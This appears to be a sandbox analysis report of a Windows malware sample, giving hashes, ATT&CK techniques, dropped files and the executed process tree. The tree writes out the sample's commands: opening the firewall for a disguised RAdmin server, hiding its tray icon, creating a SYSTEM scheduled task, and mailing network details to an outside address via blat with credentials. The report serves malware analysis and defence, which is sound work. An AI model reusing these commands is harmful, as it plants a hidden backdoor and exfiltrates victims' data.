03821a79ec633526bdbb0aa6aa8e7cdfa67d8207444133d9467f75196da99612

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
09/03/2024, 19:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

03821a79ec633526bdbb0aa6aa8e7cdfa67d8207444133d9467f75196da99612.exe
Size

392KB
MD5

1839f51ab6ca69146fc987a3d8748f0a
SHA1

cb0de654492fc306aaf40a23e4bdb19b3fbb7f1e
SHA256

03821a79ec633526bdbb0aa6aa8e7cdfa67d8207444133d9467f75196da99612
SHA512

d6b70197615f2523c941a89bdf59b0eb11adf0eb716661414282b2cce81f057d07466e618f1fbc8bf629f787e36d1821143813c1eadffca036f68858ea7f08ba
SSDEEP

12288:401XB3fTg2RV36C3GwBkzZjwFu6mY3gOfgSN:401XB3fx361Ukd8zN3gsv

Score

8^/10

evasion

Malware Config

Signatures

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
3680	netsh.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	03821a79ec633526bdbb0aa6aa8e7cdfa67d8207444133d9467f75196da99612.exe

Executes dropped EXE 6 IoCs

pid	Process
2040	cmdow.exe
2436	svchost.exe
3564	svchost.exe
3444	svchost.exe
1808	blat.exe
1804	blat.exe

Loads dropped DLL 3 IoCs

pid	Process
2436	svchost.exe
3564	svchost.exe
3444	svchost.exe

Drops file in System32 directory 7 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\blat.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\blat.exe	cmd.exe
File created	C:\Windows\SysWOW64\blat.lib	cmd.exe
File opened for modification	C:\Windows\SysWOW64\blat.lib	cmd.exe
File created	C:\Windows\SysWOW64\blat.dll	cmd.exe
File opened for modification	C:\Windows\SysWOW64\blat.dll	cmd.exe
File created	C:\Windows\SysWOW64\ip.txt	cmd.exe

Drops file in Windows directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\admdll.dll	cmd.exe
File created	C:\Windows\svchost.exe	cmd.exe
File opened for modification	C:\Windows\svchost.exe	cmd.exe
File created	C:\Windows\raddrv.dll	cmd.exe
File opened for modification	C:\Windows\raddrv.dll	cmd.exe
File created	C:\Windows\admdll.dll	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3020	1804	WerFault.exe	103

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
1380	schtasks.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
4956	ipconfig.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
1680	reg.exe
4792	reg.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2040	cmdow.exe
2040	cmdow.exe
2040	cmdow.exe
2040	cmdow.exe
2040	cmdow.exe

Suspicious use of WriteProcessMemory 33 IoCs

description	pid	Process	procid_target
PID 4800 wrote to memory of 1124	4800	03821a79ec633526bdbb0aa6aa8e7cdfa67d8207444133d9467f75196da99612.exe	89
PID 4800 wrote to memory of 1124	4800	03821a79ec633526bdbb0aa6aa8e7cdfa67d8207444133d9467f75196da99612.exe	89
PID 4800 wrote to memory of 1124	4800	03821a79ec633526bdbb0aa6aa8e7cdfa67d8207444133d9467f75196da99612.exe	89
PID 1124 wrote to memory of 2040	1124	cmd.exe	92
PID 1124 wrote to memory of 2040	1124	cmd.exe	92
PID 1124 wrote to memory of 2040	1124	cmd.exe	92
PID 1124 wrote to memory of 3680	1124	cmd.exe	95
PID 1124 wrote to memory of 3680	1124	cmd.exe	95
PID 1124 wrote to memory of 3680	1124	cmd.exe	95
PID 1124 wrote to memory of 4792	1124	cmd.exe	96
PID 1124 wrote to memory of 4792	1124	cmd.exe	96
PID 1124 wrote to memory of 4792	1124	cmd.exe	96
PID 1124 wrote to memory of 1680	1124	cmd.exe	97
PID 1124 wrote to memory of 1680	1124	cmd.exe	97
PID 1124 wrote to memory of 1680	1124	cmd.exe	97
PID 1124 wrote to memory of 2436	1124	cmd.exe	98
PID 1124 wrote to memory of 2436	1124	cmd.exe	98
PID 1124 wrote to memory of 2436	1124	cmd.exe	98
PID 1124 wrote to memory of 3564	1124	cmd.exe	99
PID 1124 wrote to memory of 3564	1124	cmd.exe	99
PID 1124 wrote to memory of 3564	1124	cmd.exe	99
PID 1124 wrote to memory of 1808	1124	cmd.exe	101
PID 1124 wrote to memory of 1808	1124	cmd.exe	101
PID 1124 wrote to memory of 1808	1124	cmd.exe	101
PID 1124 wrote to memory of 4956	1124	cmd.exe	102
PID 1124 wrote to memory of 4956	1124	cmd.exe	102
PID 1124 wrote to memory of 4956	1124	cmd.exe	102
PID 1124 wrote to memory of 1804	1124	cmd.exe	103
PID 1124 wrote to memory of 1804	1124	cmd.exe	103
PID 1124 wrote to memory of 1804	1124	cmd.exe	103
PID 1124 wrote to memory of 1380	1124	cmd.exe	118
PID 1124 wrote to memory of 1380	1124	cmd.exe	118
PID 1124 wrote to memory of 1380	1124	cmd.exe	118

C:\Users\Admin\AppData\Local\Temp\03821a79ec633526bdbb0aa6aa8e7cdfa67d8207444133d9467f75196da99612.exe
"C:\Users\Admin\AppData\Local\Temp\03821a79ec633526bdbb0aa6aa8e7cdfa67d8207444133d9467f75196da99612.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4800
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\install.bat" "
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  PID:1124
- - C:\cmdow.exe
    cmdow @ /HID
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:2040
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add allowedprogram "C:\Windows\svchost.exe" "Remote Administrator Server" ENABLE
    3⤵
    - Modifies Windows Firewall
    PID:3680
- - C:\Windows\SysWOW64\reg.exe
    REG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f
    3⤵
    - Modifies registry key
    PID:4792
- - C:\Windows\SysWOW64\reg.exe
    REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d "Service Host Controller" /f
    3⤵
    - Modifies registry key
    PID:1680
- - C:\Windows\svchost.exe
    "C:\Windows/svchost.exe" /install /silence
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2436
- - C:\Windows\svchost.exe
    "C:\Windows/svchost.exe" /start
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:3564
- - C:\Windows\SysWOW64\blat.exe
    C:\Windows/system32/blat.exe -install -server smtp.bk.ru -port 25 -f [email protected] -u 3xxx92 -pw 474568317159753
    3⤵
    - Executes dropped EXE
    PID:1808
- - C:\Windows\SysWOW64\ipconfig.exe
    ipconfig /all
    3⤵
    - Gathers network information
    PID:4956
- - C:\blat.exe
    blat.exe C:\Windows/system32/ip.txt -to [email protected]
    3⤵
    - Executes dropped EXE
    PID:1804
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1804 -s 588
      4⤵
      Program crash
      PID:3020
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn "security" /sc minute /mo 15 /ru "NT AUTHORITY\SYSTEM" /tr C:\Windows/system32\ip.bat
    3⤵
    - Creates scheduled task(s)
    PID:1380

C:\Windows\svchost.exe
"C:\Windows\svchost.exe" /service
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1804 -ip 1804
1⤵
PID:2436

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\SysWOW64\ip.txt

Filesize
1023B

MD5
95410e55584ab8aadd46040596952978

SHA1
fd2108b1755a41f5229614ca72c9733b20fd9d53

SHA256
1fbc098eb2f64e7cb848e6311c4cd04e5f5c3ee21f7968f6c1832aeda632044b

SHA512
73655c0b9a36c3e2787a1dc54be999a15414d51c8a72e316c67a41bb2ff93c300fcb525049915d8af7946b115050095c9166ced91f08d72edf984ded6a7698cd

Download Submit
C:\\admdll.dll

Filesize
88KB

MD5
c915181e93fe3d4c41b1963180d3c535

SHA1
f35e66bec967d4254338a120eea8159f29c06a99

SHA256
d8fc5d545e684a4d5001004463f762d190bee478eb3a329f65998bad53d3c958

SHA512
2a5ceeb919546a713e172823da75e8f58c98c1dcedfaa7cacbd48af57bcb8da49c6289908c6c2a1bb6bda4cc7fac58adffae4a500dfe0c503397ca9aa8e92e21

Download Submit
C:\\blat.dll

Filesize
120KB

MD5
724cae63522f6e5f7565a3bf4b2a719b

SHA1
18620dbd4357d85918070f669ff4b61755290757

SHA256
b87814eaf1cd5268e797f1119b58e3fd79381af3f530be9a90993198cbce1779

SHA512
af68749cadf9920a8bed455a2557b1faf475d30fdd62f45da6757fbc5a59341fffeccca4ff646b334da95cf673deeeea74bdbb27a16f510a4e3309055f89817d

Download Submit
C:\\blat.exe

Filesize
112KB

MD5
31f84e433e8d1865e322998a41e6d90e

SHA1
cbea6cda10db869636f57b1cffad39b22e6f7f17

SHA256
aeca4a77d617da84296b5f857b2821333fe4b9663e8df74ef5a25a7882693e5e

SHA512
7ae504723b5b140e45af3163d1bfdc5ee0497debafba07cfbf1d2c15147c000be53f4ac8d36d926ed11cf0bb62e9e72f9bcf5d4caf92aa732d942f55834e2be9

Download Submit
C:\\blat.lib

Filesize
2KB

MD5
3cd3cffda2b5108e2778f94429c624d6

SHA1
3e4d218d1b8eb4fa1ab5152b126951892aff3dc9

SHA256
b545194041588fc0a6f57e7eb5a93d2418aaa263d246e3c696a79ee5859770ff

SHA512
c80080afcc982c4e950876756fb32c7f24fbe45bfbbe78afe144be1ede86dc9ef1e57db95d3df7f4c6011fd226f23684b929781b55d1be659cfa75d14f8d0c79

Download Submit
C:\\raddrv.dll

Filesize
28KB

MD5
b50d22ab0323cbd0fedfdf4689bc1301

SHA1
efd6ef059fa6ef25791e7ee660d63b05d0c11963

SHA256
970786caf18ef731b0e1a562e7155c7b7fe525fc000c14a6156ac19292922bc0

SHA512
91961bd7fe9744f56a1dde2123d78db428f3d7c1dd0155458a73e822f3073d5221e95cc4441d824b36b556765660ae781282c3c4d95e3a810abf4ff84c0c5bfc

Download Submit
C:\\svchost.exe

Filesize
180KB

MD5
4da2155a683838f6d2ff544437fb76c8

SHA1
45c08891e4f811c3eee4d84474d7ca230b12f4ec

SHA256
0425a758ee783e178f0e3259cd07f7ba41f6fcca1146631636613d247809345b

SHA512
51228f948e8a2e94f8c8b6bf243557f4430003d72a6ae2388b34b60d904e257bab8e7287cc053d86f01e0011994f9007170d227d274f9d0aac6326a1643af54e

Download Submit
C:\cmdow.exe

Filesize
30KB

MD5
48a78bf8ef453d9ca4d6c0587ae2de94

SHA1
fdcc71edb09d13165abb106dec95b5376cc05527

SHA256
319390597ae00859d5862aec261584cdb8e6c863c06ac69fecbe374165491756

SHA512
d30ff0df216637f1361fd76a0b18fbfc95f8917e04c2feef504edf57a2056d988d096a1de6189462971cbd718b61bcb7874860a38fd54bebf2970e90b37db11d

Download Submit
C:\install.bat

Filesize
1KB

MD5
b326302bbf521a1f38add9e94ca8ffb6

SHA1
9f810c52fe5aba139480a89ccf1ced4cbd6eddc8

SHA256
7319d41bd0ac2c5912dab2f63fb8c24c8cc2c19e94fe479a546682f606496832

SHA512
1050db5a16689357b9dd5d4bd6a8d0f281da5dab4f1c79e956df1390487abe5412f1cea00c1c0bd2b7d3e68850bf4d31db749ff8ef29757efdfa2e35706b134c

Download Submit
memory/2436-46-0x0000000001080000-0x00000000010D7000-memory.dmp

Filesize
348KB

Download
memory/2436-47-0x0000000001080000-0x00000000010D7000-memory.dmp

Filesize
348KB

Download
memory/3444-53-0x0000000001150000-0x00000000011A7000-memory.dmp

Filesize
348KB

Download
memory/3444-61-0x0000000001150000-0x00000000011A7000-memory.dmp

Filesize
348KB

Download
memory/3564-50-0x0000000001080000-0x00000000010D7000-memory.dmp

Filesize
348KB

Download
memory/3564-54-0x0000000001080000-0x00000000010D7000-memory.dmp

Filesize
348KB

Download
memory/4800-0-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/4800-41-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download